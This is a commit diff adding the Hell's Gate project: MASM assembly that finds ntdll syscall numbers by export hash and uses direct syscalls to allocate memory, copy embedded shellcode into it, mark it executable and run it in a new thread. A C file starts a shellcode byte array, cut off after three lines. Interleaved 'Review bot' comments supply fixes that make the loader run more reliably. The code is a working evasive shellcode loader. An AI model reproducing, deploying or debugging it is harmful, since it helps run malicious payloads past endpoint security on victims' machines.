Add files via upload
This commit is contained in:
parent
ad3ed5a13f
commit
a6dbe47b59
|
@ -0,0 +1,262 @@
|
|||
; @file HELLSGATE.ASM
|
||||
; @data 07-08-2020
|
||||
; @author Paul Laîné (@am0nsec)
|
||||
; @version 1.0
|
||||
; @brief Dynamically extracting and invoking syscalls from in-memory modules.
|
||||
; @details
|
||||
; @link https://ntamonsec.blogspot.com/
|
||||
; @copyright This project has been released under the GNU Public License v3 license.
|
||||
|
||||
include HELLSGATE.INC
|
||||
|
||||
_DATA segment
|
||||
extern Shellcode: BYTE
|
||||
extern ShellcodeLength: QWORD
|
||||
|
||||
wSystemCall DWORD 000h
|
||||
lpAddress QWORD ?
|
||||
sDataSize QWORD ?
|
||||
OldProtect QWORD ?
|
||||
hThreadHandle QWORD ?
|
||||
|
||||
VXTable VX_TABLE <>
|
||||
Timeout LARGE_INTEGER <>
|
||||
_DATA ends
|
||||
|
||||
_TEXT segment
|
||||
SystemCall PROC
|
||||
mov r10, rcx
|
||||
syscall
|
||||
ret
|
||||
SystemCall ENDP
|
||||
|
||||
HellsGate PROC
|
||||
_start:
|
||||
mov r8, gs:[60h] ; Get process environment block (PEB)
|
||||
cmp [r8].PEB.OSMajorVersion, 0Ah ;
|
||||
jne _failure ; Jump if not Windows 10
|
||||
|
||||
; Get the base address of ntdll
|
||||
mov r8, [r8].PEB.Ldr ;
|
||||
mov r8, [r8].PEB_LDR_DATA.InMemoryOrderModuleList.Flink - 10h ; First loaded module: e.g. hellsgate.exe
|
||||
mov r8, [r8].LDR_DATA_TABLE_ENTRY.InMemoryOrderLinks.Flink - 10h ; Second loaded module: e.g. ntdll.dll
|
||||
mov r8, [r8].LDR_DATA_TABLE_ENTRY.DllBase ; Image base of the module
|
||||
mov r9, r8 ; Store for later use
|
||||
|
||||
; Get module export directory
|
||||
cmp [r8].IMAGE_DOS_HEADER.e_magic, 5A4Dh ; DOS Header --> MZ
|
||||
jne _failure ;
|
||||
|
||||
mov ebx, [r8].IMAGE_DOS_HEADER.e_lfanew ; RVA of IMAGE_NT_HEADERS64
|
||||
add r8, rbx ;
|
||||
cmp [r8].IMAGE_NT_HEADERS64.Signature, 00004550h ; NT Header --> PE00
|
||||
jne _failure ;
|
||||
|
||||
mov ebx, IMAGE_NT_HEADERS64.OptionalHeader ; RVA of IMAGE_OPTIONAL_HEADER64
|
||||
add r8, rbx ;
|
||||
cmp [r8].IMAGE_OPTIONAL_HEADER64.Magic, 20bh ; Optional header --> 0x20b
|
||||
jne _failure ;
|
||||
|
||||
lea r8, [r8].IMAGE_OPTIONAL_HEADER64.DataDirectory ; First entry of the DataDirectory array
|
||||
mov ebx, [r8].IMAGE_DATA_DIRECTORY.VirtualAddress ; RVA of IMAGE_EXPORT_DIRECTORY
|
||||
mov r8, r9 ; ImageBase
|
||||
add r8, rbx ; Module + RVA
|
||||
|
||||
; Push function hashes
|
||||
mov VXTable.NtAllocateVirtualMemory.dwHash, 002B73D648h ; DJB2 hash of NtAllocateVirtualMemory
|
||||
mov VXTable.NtProtectVirtualMemory.dwHash, 00FE950644h ; DJB2 hash of NtProtectVirtualMemory
|
||||
mov VXTable.NtCreateThreadEx.dwHash, 00B151D7ACh ; DJB2 hash of NtCreateThreadEx
|
||||
mov VXTable.NtWaitForSingleObject.dwHash, 0091F4EA38h ; DJB2 hash of NtWaitForSingleObject
|
||||
|
||||
xor r15, r15 ; Clean R15 register
|
||||
mov r15b, 4h ; Move to R15 number of functions to find
|
||||
|
||||
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfNames ; Address of the function name
|
||||
mov r12, r9 ; Function name RVA
|
||||
add r12, rbx ; ImageBase + RVA
|
||||
|
||||
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfFunctions ; Address of function pointers
|
||||
mov r13, r9 ;
|
||||
add r13, rbx ;
|
||||
|
||||
mov ebx, [r8].IMAGE_EXPORT_DIRECTORY.AddressOfNameOrdinals ; Address of function ordinals
|
||||
mov r14, r9 ;
|
||||
add r14, rbx ;
|
||||
|
||||
mov ecx, [r8].IMAGE_EXPORT_DIRECTORY.NumberOfNames ; Total number of named functions
|
||||
dec ecx
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Find function ordinal index w/ function name hash
|
||||
;-----------------------------------------------------------------------------
|
||||
_parse_functions_name:
|
||||
mov rbx, 4h ; sizeof(DWORD)
|
||||
imul rbx, rcx ; siezof(DWORD) * RCX
|
||||
mov esi, [r12 + rbx] ; Function RVA
|
||||
add rsi, r9 ; Function RVA + ImageBase
|
||||
|
||||
mov r10d, 5381h ; hash = 0x5381
|
||||
_djb2:
|
||||
mov r11d, r10d ; Store original hash value for later
|
||||
shl r10d, 5 ; hash << 5
|
||||
add r10d, r11d ; (hash << 5) + hash
|
||||
|
||||
xor r11d, r11d ; Clean temporary hash value
|
||||
mov r11b, byte ptr [rsi] ; Get ASCII char
|
||||
add r10d, r11d ; ((hash << 5) + hash) + char
|
||||
|
||||
inc rsi ; Next string char
|
||||
cmp byte ptr [rsi], 00h ; End of string
|
||||
jne _djb2 ;
|
||||
|
||||
lea rax, VXTable ; Address of VX table
|
||||
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
|
||||
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
|
||||
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
|
||||
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
|
||||
xor r10d, [rax].VX_TABLE_ENTRY.dwHash ; Check if function has been found
|
||||
jz _get_function_address ;
|
||||
loop _parse_functions_name ;
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Find the function address w/ function ordinal
|
||||
;-----------------------------------------------------------------------------
|
||||
_get_function_address:
|
||||
mov rax, 2h ; sizeof(WORD)
|
||||
imul rax, rcx ; sizeof(WORD) * RCX
|
||||
mov ax, [r14 + rax] ; AX = function ordinal
|
||||
|
||||
imul rax, 4 ; sizeof(DWORD) * ordinal
|
||||
mov eax, [r13 + rax] ; RVA of function
|
||||
mov rbx, r9 ; RBX = ImageBase
|
||||
add rbx, rax ; RBX = address of function
|
||||
|
||||
lea rax, VXTable ; Address of VX table
|
||||
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
|
||||
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
|
||||
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
|
||||
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
|
||||
mov [rax].VX_TABLE_ENTRY.pAddress, rbx ;
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Find the function system call w/ function address
|
||||
;-----------------------------------------------------------------------------
|
||||
_get_function_syscall:
|
||||
inc rbx
|
||||
cmp byte ptr [rbx], 00C3h ; Check if RET
|
||||
je _failure ;
|
||||
|
||||
cmp word ptr [rbx], 050Fh ; Check if syscall
|
||||
jne _get_function_syscall ;
|
||||
|
||||
sub rbx, 0Eh ; Address of system call
|
||||
mov cx, word ptr [rbx] ; CX = system call
|
||||
|
||||
lea rax, VXTable ; Address of VX table
|
||||
mov rdx, VXTableEntrySize ; RDX = sizeof(VX_TABLE_ENTRY)
|
||||
imul rdx, r15 ; RDX = sizeof(VX_TABLE_ENTRY) * R15
|
||||
sub rdx, 10h ; RDX = (sizeof(VX_TABLE_ENTRY) * R15) - sizeof(VX_TABLE_ENTRY)
|
||||
add rax, rdx ; RAX = VX_TABLE[RDX].pAddress = RBX
|
||||
mov [rax].VX_TABLE_ENTRY.wSystemCall, cx ;
|
||||
|
||||
_reset_loop:
|
||||
; Move to the next function
|
||||
mov ecx, [r8].IMAGE_EXPORT_DIRECTORY.NumberOfNames ; Reset counter
|
||||
dec ecx ;
|
||||
dec r15 ; Check if all function have been found
|
||||
jnz _parse_functions_name ;
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Execute the payload
|
||||
;-----------------------------------------------------------------------------
|
||||
_payload:
|
||||
; Initialise variables
|
||||
mov r10, ShellcodeLength ;
|
||||
mov sDataSize, r10 ; Store shellcode length
|
||||
mov lpAddress, 0h ;
|
||||
|
||||
; Execute NtAllocateVirtualMemory
|
||||
mov ax, VXTable.NtAllocateVirtualMemory.wSystemCall ;
|
||||
mov rcx, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
|
||||
lea rdx, lpAddress ; BaseAddress
|
||||
xor r8, r8 ; ZeroBits
|
||||
lea r9, sDataSize ; RegionSize
|
||||
mov qword ptr [rsp + 20h], 3000h ; AllocationType
|
||||
mov qword ptr [rsp + 28h], 4 ; Protect
|
||||
|
||||
call SystemCall ;
|
||||
cmp eax, 00h ; (NTSTATUS != 0)
|
||||
jne _failure ;
|
||||
|
||||
; Copy shellcode
|
||||
cld ; Clear direction flag == forward copy
|
||||
lea rsi, Shellcode ; Origin
|
||||
mov rdi, lpAddress ; Destination
|
||||
mov rcx, ShellcodeLength ; Size of shellcode
|
||||
rep movsb ; Copy byte until RCX = 0
|
||||
|
||||
; Execute NtProtectVirtualMemory
|
||||
mov ax, VXTable.NtProtectVirtualMemory.wSystemCall ;
|
||||
mov rcx, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
|
||||
lea rdx, lpAddress ; BaseAddress
|
||||
lea r8, sDataSize ; NumberOfBytesToProtect
|
||||
mov r9d, 20h ; NewAccessProtection
|
||||
|
||||
mov OldProtect, 00h ;
|
||||
lea r11, OldProtect ;
|
||||
mov qword ptr [rsp + 20h], r11 ; OldAccessProtection
|
||||
|
||||
call SystemCall ;
|
||||
cmp eax, 00h ; (NTSTATUS != 0)
|
||||
jne _failure ;
|
||||
|
||||
; Execute NtCreateThreadEx
|
||||
mov ax, VXTable.NtCreateThreadEx.wSystemCall
|
||||
mov hThreadHandle, 0 ;
|
||||
lea rcx, hThreadHandle ; hThread
|
||||
mov rdx, 1FFFFFh ; DesiredAccess
|
||||
xor r8, r8 ; ObjectAttributes
|
||||
mov r9, 0FFFFFFFFFFFFFFFFh ; ProcessHandle
|
||||
mov r10, lpAddress ;
|
||||
mov qword ptr [rsp + 20h], r10 ; lpStartAddress
|
||||
mov qword ptr [rsp + 28h], 00h ; lpParameter
|
||||
mov qword ptr [rsp + 30h], 00h ; Flags
|
||||
mov qword ptr [rsp + 38h], 00h ; StackZeroBits
|
||||
mov qword ptr [rsp + 40h], 00h ; SizeOfStackCommit
|
||||
mov qword ptr [rsp + 48h], 00h ; SizeOfStackReserve
|
||||
mov qword ptr [rsp + 50h], 00h ; lpBytesBuffer
|
||||
|
||||
call SystemCall ;
|
||||
cmp eax, 00h ; (NTSTATUS != 0)
|
||||
jne _failure ;
|
||||
|
||||
; Execute NtWaitForSingleObject
|
||||
mov ax, VXTable.NtWaitForSingleObject.wSystemCall ;
|
||||
mov rcx, hThreadHandle ; ObjectHandle
|
||||
xor rdx, rdx ; Alertable
|
||||
|
||||
mov Timeout, 0FFFFFFFFFF676980h ; TimeOut
|
||||
lea r8, Timeout ;
|
||||
|
||||
call SystemCall ;
|
||||
cmp eax, 00h ; (NTSTATUS != 0)
|
||||
jne _failure ;
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; Successfully execution of the function
|
||||
;-----------------------------------------------------------------------------
|
||||
_success:
|
||||
mov rax, 1
|
||||
ret
|
||||
|
||||
;-----------------------------------------------------------------------------
|
||||
; In case something goes wrong
|
||||
;-----------------------------------------------------------------------------
|
||||
_failure:
|
||||
xor rax, rax
|
||||
ret
|
||||
HellsGate ENDP
|
||||
_TEXT ends
|
||||
|
||||
; end of file
|
||||
end
|
|
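Review bot: `HellsGate` stores its outgoing stack arguments with `mov qword ptr [rsp + 20h], ...` through `[rsp + 50h]` in `_payload` without ever reserving stack space, so every store above `[rsp + 28h]` lands beyond its own return address in the C caller's frame (the NtCreateThreadEx block writes seven such slots), and the procedure also overwrites the Win64 callee-saved `rbx`, `rsi`, `rdi` and `r12`–`r15` without saving them. The offsets themselves are right relative to the push done by `call SystemCall`, so the fix is a prologue/epilogue that saves those registers and carves out the argument area, as below, with `_success` routed through the shared epilogue. Separately, when no export hash matches, `loop _parse_functions_name` falls through into `_get_function_address` with `rcx = 0` and silently resolves export 0 instead of failing, so a `jmp _failure` belongs right after the `loop`. Finally, `mov ax, VXTable.*.wSystemCall` is a partial write that leaves bits 16–63 of `rax` holding the VX table address left by the preceding `lea rax, VXTable`; whether that is harmless depends on the kernel masking the number, so `movzx eax, VXTable.*.wSystemCall` is the safe form.
```asm
HellsGate PROC
_start:
    push rbx                        ; Win64 ABI: save every callee-saved register this PROC clobbers
    push rsi
    push rdi
    push r12
    push r13
    push r14
    push r15
    sub  rsp, 60h                   ; home space + 7 stack args (NtCreateThreadEx), keeps RSP 16-byte aligned at each call
    ; ... unchanged: PEB walk, export parsing, syscall extraction, payload ...
    loop _parse_functions_name      ;
    jmp  _failure                   ; hash not found in the export table
    ; ... unchanged: _get_function_address, _get_function_syscall, _reset_loop, _payload ...
_success:
    mov  rax, 1
    jmp  _epilogue
_failure:
    xor  rax, rax
_epilogue:
    add  rsp, 60h
    pop  r15
    pop  r14
    pop  r13
    pop  r12
    pop  rdi
    pop  rsi
    pop  rbx
    ret
HellsGate ENDP
```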
@ -0,0 +1,285 @@
|
|||
; @file HELLSGATE.INC
|
||||
; @data 07-08-2020
|
||||
; @author Paul Laîné (@am0nsec)
|
||||
; @version 1.0
|
||||
; @brief Dynamically extracting and invoking syscalls from in-memory modules.
|
||||
; @details
|
||||
; @link https://ntamonsec.blogspot.com/
|
||||
; @copyright This project has been released under the GNU Public License v3 license.
|
||||
|
||||
VXTableEntrySize EQU SIZEOF VX_TABLE_ENTRY
|
||||
VXTableSize EQU SIZEOF VX_TABLE
|
||||
|
||||
VX_TABLE_ENTRY struct
|
||||
pAddress QWORD ? ; 0x0000
|
||||
dwHash DWORD ? ; 0x0008
|
||||
wSystemCall WORD ? ; 0x000C
|
||||
BYTE 2 dup(?) ; padding
|
||||
VX_TABLE_ENTRY ends
|
||||
|
||||
VX_TABLE struct
|
||||
NtAllocateVirtualMemory VX_TABLE_ENTRY <> ; 0x0000
|
||||
NtProtectVirtualMemory VX_TABLE_ENTRY <> ; 0x0010
|
||||
NtCreateThreadEx VX_TABLE_ENTRY <> ; 0x0020
|
||||
NtWaitForSingleObject VX_TABLE_ENTRY <> ; 0x0030
|
||||
VX_TABLE ends
|
||||
|
||||
LARGE_INTEGER struct
|
||||
LowPart DWORD ? ; 0x0000
|
||||
HighPart DWORD ? ; 0x0004
|
||||
LARGE_INTEGER ends
|
||||
|
||||
ULARGE_INTEGER struct
|
||||
LowPart DWORD ? ; 0x0000
|
||||
HighPart DWORD ? ; 0x0004
|
||||
ULARGE_INTEGER ends
|
||||
|
||||
UNICODE_STRING struct
|
||||
_Length WORD ? ; 0x0000
|
||||
MaximumLength WORD ? ; 0x0002
|
||||
BYTE 4 dup(?) ; padding
|
||||
Buffer QWORD ? ; 0x0008
|
||||
UNICODE_STRING ends
|
||||
|
||||
LIST_ENTRY struct
|
||||
Flink QWORD ? ; 0x0000
|
||||
BLink QWORD ? ; 0x0008
|
||||
LIST_ENTRY ends
|
||||
|
||||
PEB struct
|
||||
InheritedAddressSpace BYTE ? ; 0x0000
|
||||
ReadImageFileExecOptions BYTE ? ; 0x0001
|
||||
BeingDebugged BYTE ? ; 0x0002
|
||||
BitField BYTE ? ; 0x0003
|
||||
Padding0 BYTE 4 dup(?) ; 0x0004
|
||||
Mutant QWORD ? ; 0x0008
|
||||
ImageBaseAddress QWORD ? ; 0x0010
|
||||
Ldr QWORD ? ; 0x0018
|
||||
ProcessParameters QWORD ? ; 0x0020
|
||||
SubSystemData QWORD ? ; 0x0028
|
||||
ProcessHeap QWORD ? ; 0x0030
|
||||
FastPebLock QWORD ? ; 0x0038
|
||||
AtlThunkSListPtr QWORD ? ; 0x0040
|
||||
IFEOKey QWORD ? ; 0x0048
|
||||
CrossProcessFlags DWORD ? ; 0x0050
|
||||
Padding1 BYTE 4 dup(?) ; 0x0054
|
||||
UserSharedInfoPtr QWORD ? ; 0x0058
|
||||
SystemReserved DWORD ? ; 0x0060
|
||||
AtlThunkSListPtr32 DWORD ? ; 0x0064
|
||||
ApiSetMap QWORD ? ; 0x0068
|
||||
TlsExpansionCounter DWORD ? ; 0x0070
|
||||
Padding2 BYTE 4 dup(?) ; 0x0074
|
||||
TlsBitmap QWORD ? ; 0x0078
|
||||
TlsBitmapBits DWORD 2 dup(?) ; 0x0080
|
||||
ReadOnlySharedMemoryBase QWORD ? ; 0x0088
|
||||
SharedData QWORD ? ; 0x0090
|
||||
ReadOnlyStaticServerData QWORD ? ; 0x0098
|
||||
AnsiCodePageData QWORD ? ; 0x00A0
|
||||
OemCodePageData QWORD ? ; 0x00A8
|
||||
UnicodeCaseTableData QWORD ? ; 0x00B0
|
||||
NumberOfProcessors DWORD ? ; 0x00B9
|
||||
NtGlobalFlag DWORD ? ; 0x00BC
|
||||
CriticalSectionTimeout LARGE_INTEGER <> ; 0x00C0
|
||||
HeapSegmentReserve QWORD ? ; 0x00C8
|
||||
HeapSegmentCommit QWORD ? ; 0x00D0
|
||||
HeapDeCommitTotalFreeThreshold QWORD ? ; 0x00D8
|
||||
HeapDeCommitFreeBlockThreshold QWORD ? ; 0x00E0
|
||||
NumberOfHeaps DWORD ? ; 0x00E8
|
||||
MaximumNumberOfHeaps DWORD ? ; 0x00EC
|
||||
ProcessHeaps QWORD ? ; 0x00F0
|
||||
GdiSharedHandleTable QWORD ? ; 0x00F8
|
||||
ProcessStarterHelper QWORD ? ; 0x0100
|
||||
GdiDCAttributeList DWORD ? ; 0x0108
|
||||
Padding3 BYTE 4 dup(?) ; 0x010C
|
||||
LoaderLock QWORD ? ; 0x0110
|
||||
OSMajorVersion DWORD ? ; 0x0118
|
||||
OSMinorVersion DWORD ? ; 0x011C
|
||||
OSBuildNumber WORD ? ; 0x0120
|
||||
OSCSDVersion WORD ? ; 0x0122
|
||||
OSPlatformId DWORD ? ; 0x0124
|
||||
ImageSubsystem DWORD ? ; 0x0128
|
||||
ImageSubsystemMajorVersion DWORD ? ; 0x012C
|
||||
ImageSubsystemMinorVersion DWORD ? ; 0x0130
|
||||
Padding4 BYTE 4 dup(?) ; 0x0134
|
||||
ActiveProcessAffinityMask QWORD ? ; 0x0138
|
||||
GdiHandleBuffer DWORD 60 dup(?) ; 0x0140
|
||||
PostProcessInitRoutine QWORD ? ; 0x0230
|
||||
TlsExpansionBitmap QWORD ? ; 0x0238
|
||||
TlsExpansionBitmapBits DWORD 32 dup(?) ; 0x0240
|
||||
SessionId DWORD ? ; 0x02C0
|
||||
Padding5 BYTE 4 dup(?) ; 0x02C4
|
||||
AppCompatFlags ULARGE_INTEGER <> ; 0x02C8
|
||||
AppCompatFlagsUser ULARGE_INTEGER <> ; 0x02D0
|
||||
pShimData QWORD ? ; 0x02D8
|
||||
AppCompatInfo QWORD ? ; 0x02E0
|
||||
CSDVersion UNICODE_STRING <> ; 0x02E8
|
||||
ActivationContextData QWORD ? ; 0x02F8
|
||||
ProcessAssemblyStorageMap QWORD ? ; 0x0300
|
||||
SystemDefaultActivationContextData QWORD ? ; 0x0308
|
||||
SystemAssemblyStorageMap QWORD ? ; 0x0310
|
||||
MinimumStackCommit QWORD ? ; 0x0318
|
||||
SparePointers QWORD 4 dup(?) ; 0x0320
|
||||
SpareUlongs DWORD 5 dup(?) ; 0x0340
|
||||
BYTE 4 dup(?)
|
||||
WerRegistrationData QWORD ? ; 0x0358
|
||||
WerShipAssertPtr QWORD ? ; 0x0360
|
||||
pUnused QWORD ? ; 0x0368
|
||||
pImageHeaderHash QWORD ? ; 0x0370
|
||||
TracingFlags DWORD ? ; 0x0378
|
||||
Padding6 BYTE 4 dup(?) ; 0x037c
|
||||
CsrServerReadOnlySharedMemoryBase QWORD ? ; 0x0380
|
||||
TppWorkerpListLock QWORD ? ; 0x0388
|
||||
TppWorkerpList LIST_ENTRY <> ; 0x0390
|
||||
WaitOnAddressHashTable QWORD 128 dup(?) ; 0x03A0
|
||||
TelemetryCoverageHeader QWORD ? ; 0x07A0
|
||||
CloudFileFlags DWORD ? ; 0x07A8
|
||||
CloudFileDiagFlags DWORD ? ; 0x07AC
|
||||
PlaceholderCompatibilityMode BYTE ? ; 0x07B0
|
||||
PlaceholderCompatibilityModeReserved BYTE 7 dup(?) ; 0x07B1
|
||||
LeapSecondData QWORD ? ; 0x07B8
|
||||
LeapSecondFlags DWORD ? ; 0x07c0
|
||||
NtGlobalFlag2 DWORD ? ; 0x07c4
|
||||
PEB ends
|
||||
|
||||
PEB_LDR_DATA struct
|
||||
_Length DWORD ? ; 0x0000
|
||||
Initialized BYTE ? ; 0x0004
|
||||
BYTE 3 dup(?) ; padding
|
||||
SsHandle QWORD ? ; 0x0008
|
||||
InLoadOrderModuleList LIST_ENTRY <> ; 0x0010
|
||||
InMemoryOrderModuleList LIST_ENTRY <> ; 0x0020
|
||||
InInitializationOrderModuleList LIST_ENTRY <> ; 0x0030
|
||||
EntryInProgress QWORD ? ; 0x0040
|
||||
ShutdownInProgress BYTE ? ; 0x0048
|
||||
BYTE 7 dup(?) ; padding
|
||||
ShutdownThreadId QWORD ? ; 0x0050
|
||||
PEB_LDR_DATA ends
|
||||
|
||||
RTL_BALANCED_NODE struct
|
||||
_Dummy BYTE 24 dup(?)
|
||||
RTL_BALANCED_NODE ends
|
||||
|
||||
LDR_DATA_TABLE_ENTRY struct
|
||||
InLoadOrderLinks LIST_ENTRY <> ; 0x0000
|
||||
InMemoryOrderLinks LIST_ENTRY <> ; 0x0010
|
||||
InInitializationOrderLinks LIST_ENTRY <> ; 0x0020
|
||||
DllBase QWORD ? ; 0x0030
|
||||
EntryPoint QWORD ? ; 0x0038
|
||||
SizeOfImage DWORD ? ; 0x0040
|
||||
BYTE 4 dup(?) ; padding
|
||||
FullDllName UNICODE_STRING <> ; 0x0048
|
||||
BaseDllName UNICODE_STRING <> ; 0x0058
|
||||
FlagGroup BYTE 4 dup(?) ; 0x0068
|
||||
ObsoleteLoadCount WORD ? ; 0x006C
|
||||
TlsIndex WORD ? ; 0x006E
|
||||
HashLinks LIST_ENTRY <> ; 0x0070
|
||||
TimeDateStamp DWORD ? ; 0x0080
|
||||
BYTE 4 dup(?) ; padding
|
||||
EntryPointActivationContext QWORD ? ; 0x0088
|
||||
_Lock QWORD ? ; 0x0090
|
||||
DdagNode QWORD ? ; 0x0098
|
||||
NodeModuleLink LIST_ENTRY <> ; 0x00A0
|
||||
LoadContext QWORD ? ; 0x00B0
|
||||
ParentDllBase QWORD ? ; 0x00B8
|
||||
SwitchBackContext QWORD ? ; 0x00C0
|
||||
BaseAddressIndexNode RTL_BALANCED_NODE <> ; 0x00C8
|
||||
MappingInfoIndexNode RTL_BALANCED_NODE <> ; 0x00E0
|
||||
OriginalBase QWORD ? ; 0x00F8
|
||||
LoadTime LARGE_INTEGER <> ; 0x0100
|
||||
BaseNameHashValue DWORD ? ; 0x0108
|
||||
LoadReason DWORD ? ; 0x010C
|
||||
ImplicitPathOptions DWORD ? ; 0x0110
|
||||
ReferenceCount DWORD ? ; 0x0114
|
||||
DependentLoadFlags DWORD ? ; 0x0118
|
||||
SigningLevel BYTE ? ; 0x011C
|
||||
LDR_DATA_TABLE_ENTRY ends
|
||||
|
||||
IMAGE_DOS_HEADER struct
|
||||
e_magic WORD ? ; 0x0000
|
||||
e_cblp WORD ? ; 0x0002
|
||||
e_cp WORD ? ; 0x0004
|
||||
e_crlc WORD ? ; 0x0006
|
||||
e_cparhdr WORD ? ; 0x0008
|
||||
e_minalloc WORD ? ; 0x000A
|
||||
e_maxalloc WORD ? ; 0x000C
|
||||
e_ss WORD ? ; 0x000E
|
||||
e_sp WORD ? ; 0x0010
|
||||
e_csum WORD ? ; 0x0012
|
||||
e_ip WORD ? ; 0x0014
|
||||
e_cs WORD ? ; 0x0016
|
||||
e_lfarlc WORD ? ; 0x0018
|
||||
e_ovno WORD ? ; 0x001A
|
||||
e_res WORD 4 dup(?) ; 0x001C
|
||||
e_oemid WORD ? ; 0x0024
|
||||
e_oeminfo WORD ? ; 0x0026
|
||||
e_res2 WORD 10 dup(?) ; 0x0028
|
||||
e_lfanew DWORD ? ; 0x003C
|
||||
IMAGE_DOS_HEADER ends
|
||||
|
||||
IMAGE_FILE_HEADER struct
|
||||
Machine WORD ? ; 0x0000
|
||||
NumberOfSections WORD ? ; 0x0002
|
||||
TimeDateStamp DWORD ? ; 0x0004
|
||||
PointerToSymbolTable DWORD ? ; 0x0008
|
||||
NumberOfSymbols DWORD ? ; 0x000c
|
||||
SizeOfOptionalHeader WORD ? ; 0x0010
|
||||
Characteristics WORD ? ; 0x0012
|
||||
IMAGE_FILE_HEADER ends
|
||||
|
||||
IMAGE_DATA_DIRECTORY struct
|
||||
VirtualAddress DWORD ? ; 0x0000
|
||||
_Size DWORD ? ; 0x0004
|
||||
IMAGE_DATA_DIRECTORY ends
|
||||
|
||||
IMAGE_OPTIONAL_HEADER64 struct
|
||||
Magic WORD ? ; 0x0000
|
||||
MajorLinkerVersion BYTE ? ; 0x0002
|
||||
MinorLinkerVersion BYTE ? ; 0x0003
|
||||
SizeOfCode DWORD ? ; 0x0004
|
||||
SizeOfInitializedData DWORD ? ; 0x0008
|
||||
SizeOfUninitializedData DWORD ? ; 0x000C
|
||||
AddressOfEntryPoint DWORD ? ; 0x0010
|
||||
BaseOfCode DWORD ? ; 0x0014
|
||||
ImageBase QWORD ? ; 0x0018
|
||||
SectionAlignment DWORD ? ; 0x0020
|
||||
FileAlignment DWORD ? ; 0x0024
|
||||
MajorOperatingSystemVersion WORD ? ; 0x0028
|
||||
MinorOperatingSystemVersion WORD ? ; 0x002a
|
||||
MajorImageVersion WORD ? ; 0x002C
|
||||
MinorImageVersion WORD ? ; 0x002E
|
||||
MajorSubsystemVersion WORD ? ; 0x0030
|
||||
MinorSubsystemVersion WORD ? ; 0x0032
|
||||
Win32VersionValue DWORD ? ; 0x0034
|
||||
SizeOfImage DWORD ? ; 0x0038
|
||||
SizeOfHeaders DWORD ? ; 0x003c
|
||||
CheckSum DWORD ? ; 0x0040
|
||||
Subsystem WORD ? ; 0x0044
|
||||
DllCharacteristics WORD ? ; 0x0046
|
||||
SizeOfStackReserve QWORD ? ; 0x0048
|
||||
SizeOfStackCommit QWORD ? ; 0x0050
|
||||
SizeOfHeapReserve QWORD ? ; 0x0058
|
||||
SizeOfHeapCommit QWORD ? ; 0x0060
|
||||
LoaderFlags DWORD ? ; 0x0068
|
||||
NumberOfRvaAndSizes DWORD ? ; 0x006C
|
||||
DataDirectory IMAGE_DATA_DIRECTORY 16 dup(<>) ; 0x0070
|
||||
IMAGE_OPTIONAL_HEADER64 ends
|
||||
|
||||
IMAGE_NT_HEADERS64 struct
|
||||
Signature DWORD ? ; 0x0000
|
||||
FileHeader IMAGE_FILE_HEADER <> ; 0x0004
|
||||
OptionalHeader IMAGE_OPTIONAL_HEADER64 <> ; 0x0018
|
||||
IMAGE_NT_HEADERS64 ends
|
||||
|
||||
IMAGE_EXPORT_DIRECTORY struct
|
||||
Characteristics DWORD ? ; 0x0000
|
||||
TimeDateStamp DWORD ? ; 0x0004
|
||||
MajorVersion WORD ? ; 0x0008
|
||||
MinorVersion WORD ? ; 0x000A
|
||||
_Name DWORD ? ; 0x000C
|
||||
Base DWORD ? ; 0x0010
|
||||
NumberOfFunctions DWORD ? ; 0x0014
|
||||
NumberOfNames DWORD ? ; 0x0018
|
||||
AddressOfFunctions DWORD ? ; 0x001C
|
||||
AddressOfNames DWORD ? ; 0x0020
|
||||
AddressOfNameOrdinals DWORD ? ; 0x0024
|
||||
IMAGE_EXPORT_DIRECTORY ends
|
|
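Review bot: The offset comment on `NumberOfProcessors` in `PEB` reads `0x00B9`, but the preceding `UnicodeCaseTableData QWORD` at `0x00B0` places it at `0x00B8`, which is what the layout actually produces; the comment should read `; 0x00B8`, since these annotations are the only thing a reader can check the hand-built struct against. The file also defines `VXTableEntrySize EQU SIZEOF VX_TABLE_ENTRY` before `VX_TABLE_ENTRY` is declared; whether MASM resolves that forward reference depends on the assembler version, so moving both `EQU`s below `VX_TABLE ends` removes the doubt. Finally, the PEB/LDR layouts are transcribed for one Windows 10 x64 build while the assembly only depends on `PEB.Ldr`, `PEB.OSMajorVersion`, `PEB_LDR_DATA.InMemoryOrderModuleList` and the `InMemoryOrderLinks`/`DllBase` offsets of `LDR_DATA_TABLE_ENTRY`; a header comment such as `; Layout transcribed for Windows 10 x64; HELLSGATE.ASM relies only on Ldr, OSMajorVersion, InMemoryOrderModuleList, InMemoryOrderLinks and DllBase` would tell maintainers which offsets actually need to hold on other builds.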
@ -0,0 +1,42 @@
|
|||
/**
|
||||
* @file main.c
|
||||
* @data 07-08-2020
|
||||
* @author Paul Laîné(@am0nsec)
|
||||
* @version 1.0
|
||||
* @brief Dynamically extractingand invoking syscalls from in - memory modules.
|
||||
* @details
|
||||
* @link https ://ntamonsec.blogspot.com/
|
||||
* @copyright This project has been released under the GNU Public License v3 license.
|
||||
*/
|
||||
#include <Windows.h>
|
||||
|
||||
unsigned char Shellcode[] =
|
||||
"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52"
|
||||
"\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48"
|
||||
"\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9"
|
||||
